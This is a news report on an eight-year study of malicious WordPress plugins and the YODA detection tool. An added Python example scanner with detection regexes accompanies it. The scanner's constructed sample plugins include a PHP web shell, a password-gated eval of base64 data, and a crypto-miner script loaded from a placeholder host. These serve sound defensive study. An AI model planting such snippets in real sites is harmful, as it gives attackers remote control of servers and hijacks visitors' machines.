As many as 47,337 malicious plugins were discovered on 24,931 unique websites; 3,685 of those plugins were sold through legitimate marketplaces, earning the attackers $41,500 in illicit revenue.
The findings come from an eight-year study by researchers at the Georgia Institute of Technology, built around a new tool called YODA that detects malicious WordPress plugins and traces their origin.
“Attackers posed as benign plugin authors and spread malware by distributing pirated plugins,” the researchers said in a new paper titled “Beware of Plugins You Need.”
“The number of malicious plugins on websites has steadily increased over the years, and malicious activity peaked in March 2020. Amazingly, 94% of malicious plugins installed over those 8 years are still active today.”
The large-scale study analyzed WordPress plugins installed on 410,122 unique web servers dating back to 2012, and found that plugins with a combined purchase price of $834,000 were infected by threat actors after deployment.
YODA can be integrated directly into a website or a web hosting provider's infrastructure, or deployed by a plugin marketplace. In addition to detecting hidden and counterfeit malicious plugins, the framework can also be used to establish a plugin's provenance and ownership.
It does this by scanning server-side code files and their associated metadata (e.g., header comments) to identify installed plugins, then performing syntactic and semantic analysis to flag malicious behavior.
The semantic model covers a wide range of red flags, including web shells, injection of new posts, password-protected execution of injected code, spam, code obfuscation, SEO manipulation, malware downloaders, malvertising and cryptocurrency miners.
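The two-stage pipeline described above, identifying a plugin from its header comment and then feeding syntactic pattern hits into a semantic classification, can be sketched as follows. This is an added illustration and is not YODA's code or the paper's method; the regex rules, the 80-character base64 threshold, the category names and the four constructed plugin files are all assumptions chosen to exercise the red-flag categories the article lists, and a production scanner would need real PHP parsing rather than regexes.

```python
"""Toy two-stage WordPress plugin scanner (added example, not YODA).

Stage 1: parse the plugin header comment to identify plugin and author.
Stage 2: syntactic indicators (regexes) -> semantic labels (combinations).
"""
import re

# WordPress plugin metadata lives in a PHP comment block such as
#   /* Plugin Name: Foo   Author: Bar   Version: 1.0 */
HEADER_RE = re.compile(
    r"^\s*\*?\s*(Plugin Name|Author|Author URI|Version):\s*(.+?)\s*$", re.M)

# Syntactic indicators. Patterns and thresholds are assumptions for this example.
SYNTAX = {
    # an execution sink whose argument (same statement) includes user input
    "exec_of_user_input": re.compile(
        r"\b(eval|system|shell_exec|passthru|exec|assert)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)\b"),
    "exec_sink": re.compile(r"\b(eval|system|shell_exec|passthru|exec|assert)\s*\("),
    # request parameter compared (raw or hashed) against a constant: a gate
    "password_check": re.compile(
        r"(md5|sha1)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)[^)]*\)\s*={2,3}"
        r"|\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*={2,3}\s*['\"]"),
    "long_base64": re.compile(r"['\"][A-Za-z0-9+/]{80,}={0,2}['\"]"),
    "decode_fn": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "remote_fetch": re.compile(
        r"\b(wp_remote_get|file_get_contents)\s*\(\s*['\"]https?://|\bcurl_exec\s*\("),
    "post_insert": re.compile(r"\bwp_insert_post\s*\("),
    "hidden_link": re.compile(r"display\s*:\s*none[^<]*<a\s"),
    "miner_script": re.compile(r"(?i)\b(coinhive|cryptonight|cryptoloot)\b"),
    "downloader": re.compile(r"\b(copy|file_put_contents)\s*\([^;]*https?://"),
}


def parse_header(src: str) -> tuple[str, str]:
    """Stage 1: recover plugin name and author from the header comment."""
    meta = dict(HEADER_RE.findall(src))
    return meta.get("Plugin Name", "<unknown>"), meta.get("Author", "<unknown>")


def classify(hits: set[str]) -> set[str]:
    """Stage 2: semantic labels from combinations of syntactic indicators."""
    labels = set()
    if "exec_of_user_input" in hits:
        labels.add("webshell")
    if "password_check" in hits and "exec_sink" in hits:
        labels.add("password_protected_execution")
    if "long_base64" in hits and "decode_fn" in hits:
        labels.add("obfuscation")
    if "post_insert" in hits and "remote_fetch" in hits:
        labels.add("post_injection")       # remote content becomes new posts
    if "hidden_link" in hits:
        labels.add("seo_spam")
    if "miner_script" in hits:
        labels.add("cryptominer")
    if "downloader" in hits:
        labels.add("downloader")
    return labels


def scan_plugin(src: str) -> dict:
    name, author = parse_header(src)
    hits = {rule for rule, rx in SYNTAX.items() if rx.search(src)}
    return {"plugin": name, "author": author,
            "indicators": sorted(hits), "labels": sorted(classify(hits))}


# Constructed sample plugin files (not real plugins); example.invalid is reserved.
B64 = "ZXZhbCgnbWFsaWNpb3VzJyk7" * 4   # constructed filler, not a real payload
SAMPLES = {
    "hello-footer/hello-footer.php": """<?php
/*
Plugin Name: Hello Footer
Author: Example Dev
Version: 1.0
*/
function hf_footer() { echo '<p>Thanks for visiting</p>'; }
add_action('wp_footer', 'hf_footer');
""",
    "seo-booster/seo-booster.php": """<?php
/*
Plugin Name: SEO Booster Pro
Author: Example Dev
*/
if (isset($_POST['cmd'])) { echo shell_exec($_POST['cmd']); }
""",
    "cache-helper/cache-helper.php": """<?php
/*
Plugin Name: Cache Helper
Author: Someone Else
*/
if (md5($_GET['k']) === '5f4dcc3b5aa765d61d8327deb882cf99') {
    eval(base64_decode('""" + B64 + """'));
}
""",
    "social-share/social-share.php": """<?php
/*
Plugin Name: Social Share Lite
Author: Example Dev
*/
function ssl_cron() {
    $body = file_get_contents('http://example.invalid/feed.txt');
    wp_insert_post(array('post_title' => 'News', 'post_content' => $body, 'post_status' => 'publish'));
}
function ssl_footer() {
    echo '<div style="display:none"><a href="http://example.invalid/buy">cheap pills</a></div>';
    echo '<script src="http://example.invalid/coinhive.min.js"></script>';
}
""",
}

if __name__ == "__main__":
    for path, src in SAMPLES.items():
        r = scan_plugin(src)
        print(f"{path}: {r['plugin']} by {r['author']} -> {r['labels'] or 'clean'}")
```

The split matters in practice: the syntactic layer is cheap and noisy (many legitimate plugins call `base64_decode` or `wp_insert_post`), so it is the combination rules in `classify` that decide whether a file is reported, and the header parse is what lets a finding be attributed to a named author for provenance tracking.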
Some of the other notable findings are as follows:
- 3,452 plugins available on legitimate plugin marketplaces enabled spam injection
- 40,533 plugins on 18,034 websites were infected after deployment
- Nulled plugins (pirated WordPress plugins or themes that have been tampered with to carry malicious code) accounted for 8,525 of the malicious add-ons, and around 75% of the pirated plugins cost their legitimate developers $228,000 in revenue
“By using YODA, website owners and hosting providers can identify malicious plugins on the web server; plugin developers and marketplaces can check their plugins before distribution,” the researchers pointed out.